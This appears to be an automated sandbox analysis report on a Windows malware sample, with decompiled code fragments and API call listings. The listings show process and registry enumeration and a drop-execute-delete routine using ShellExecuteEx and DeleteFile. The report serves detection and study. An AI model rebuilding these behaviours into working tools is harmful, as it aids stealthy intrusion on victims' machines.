                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                                                                						_push(0x83);
                                                                                						goto L14;
                                                                                					}
                                                                                					_push(E004119AD( &_v20, 1));
                                                                                					_push(0x41b310);
                                                                                					_push(E004119AD( &_v20, 0));
                                                                                					_t110 =  &_v88;
                                                                                					_push(_t110);
                                                                                					L00414140();
                                                                                					_push(_t110);
                                                                                					L00414140();
                                                                                					E004020C2(0x41c130, 0x7d, _t254 - 0x10);
                                                                                					goto L23;
                                                                                				}
                                                                                				_t112 = _t103 - 1;
                                                                                				if(_t112 == 0) {
                                                                                					E00412881(_t113);
                                                                                					_v24 = E004117C7(_t233 - 0x10);
                                                                                					_t118 =  &_v72;
                                                                                					L00414140();
                                                                                					_t119 =  &_v136;
                                                                                					L00414140();
                                                                                					_t120 =  &_v56;
                                                                                					L00414140();
                                                                                					L0041417C();
                                                                                					E004020C2(0x41c130, 0x7f, _t233 - 0x10);
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t120, _t120, _t119, _t119, _t118, _t118, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, _v24, E004119AD( &_v20, 0));
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					goto L23;
                                                                                				}
                                                                                				if(_t112 != 1) {
                                                                                					goto L26;
                                                                                				}
                                                                                				_t123 = E004119AD( &_v20, 2);
                                                                                				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                                                                				_push( *_t123);
                                                                                				_t125 = E004119AD( &_v20, 0);
                                                                                				_t264 = _t233 - 0x10;
                                                                                				_push(_t125);
                                                                                				_push(_t264);
                                                                                				E00412881(_t125);
                                                                                				_t127 = E00411927();
                                                                                				_t265 = _t264 + 0x14;
                                                                                				if(_t127 == 0) {
                                                                                					_push(E004119AD( &_v20, 1));
                                                                                					_push(0x41b310);
                                                                                					_push(E004119AD( &_v20, 0));
                                                                                					_t130 =  &_v104;
                                                                                					_push(_t130);
                                                                                					L00414140();
                                                                                					_push(_t130);
                                                                                					L00414140();
                                                                                					E004020C2(0x41c130, 0x84, _t265 - 0x10);
                                                                                				} else {
                                                                                					_t135 =  &_v200;
                                                                                					L00414140();
                                                                                					_t136 =  &_v168;
                                                                                					L00414140();
                                                                                					_t137 =  &_v40;
                                                                                					L00414140();
                                                                                					L00414140();
                                                                                					E004020C2(0x41c130, 0x7e, _t265 - 0x10);
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t137, _t137, _t136, _t136, _t135, _t135, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, E004119AD( &_v20, 2));
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				goto L23;
                                                                                			}

                                                                                APIs
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410F16
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,00018C06), ref: 00410F2E
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410F38
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410F41
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00410F52
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F61
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,00000000), ref: 00411012
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000), ref: 00411022
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 0041102F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                                                                  • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,?,?,00411AD6), ref: 00412E5A
                                                                                  • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00411AD6), ref: 00412E64
                                                                                  • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$?size@?$basic_string@CreateD@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSaveStreammalloc
                                                                                • String ID: dat$image/png$png
                                                                                • API String ID: 1465418526-186023265
                                                                                • Opcode ID: 7bb990d58628e3a28b85cd86f421cfa4cbeba9bc6ff5b0cd4daa95a6987296ea
                                                                                • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                                                                • Opcode Fuzzy Hash: 7bb990d58628e3a28b85cd86f421cfa4cbeba9bc6ff5b0cd4daa95a6987296ea
                                                                                • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                                                                  • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                                                                  • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                  • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,000197E8), ref: 00412B5E
                                                                                  • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                                                                • String ID:
                                                                                • API String ID: 819894693-0
                                                                                • Opcode ID: 5ceb64c33a25fdc5815c71a6d414f293c6035e853cd266936d296e1fa0de53de
                                                                                • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                                                                • Opcode Fuzzy Hash: 5ceb64c33a25fdc5815c71a6d414f293c6035e853cd266936d296e1fa0de53de
                                                                                • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                                                                • RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                                                                • RegEnumValueW.ADVAPI32 ref: 0040BC67
                                                                                • _itoa.MSVCRT ref: 0040BC7E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?,?,0040BE7D,0040C731), ref: 0040BC96
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000,?,0040BE7D,0040C731), ref: 0040BCA8
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCB6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCBF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCCB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415770,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCE0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCEF
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCFD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD06
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD12
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD27
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD42
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD50
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD5E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD6A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD76
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                                                                • String ID: [regsplt]
                                                                                • API String ID: 2158026845-4262303796
                                                                                • Opcode ID: 049dabd025bde2f4b6e2c70b7fde98284d8e67a683d246eaa9034b12ebeed36f
                                                                                • Instruction ID: 89d9bd96600c6e247975aaf8b0d3d97a5ae7f77b1b3f2a4fe7097baafbd20519
                                                                                • Opcode Fuzzy Hash: 049dabd025bde2f4b6e2c70b7fde98284d8e67a683d246eaa9034b12ebeed36f
                                                                                • Instruction Fuzzy Hash: C971977290021EEBDB11DBD0DD89DEEBB7DEF48345F004166E606A2150EB745A89CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                                                                • getenv.MSVCRT ref: 0040EFDC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                                                                • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                                                                • ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                                                                • CloseHandle.KERNEL32(?), ref: 0040F0D2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F116
                                                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040F12E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F137
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F140
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F149
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
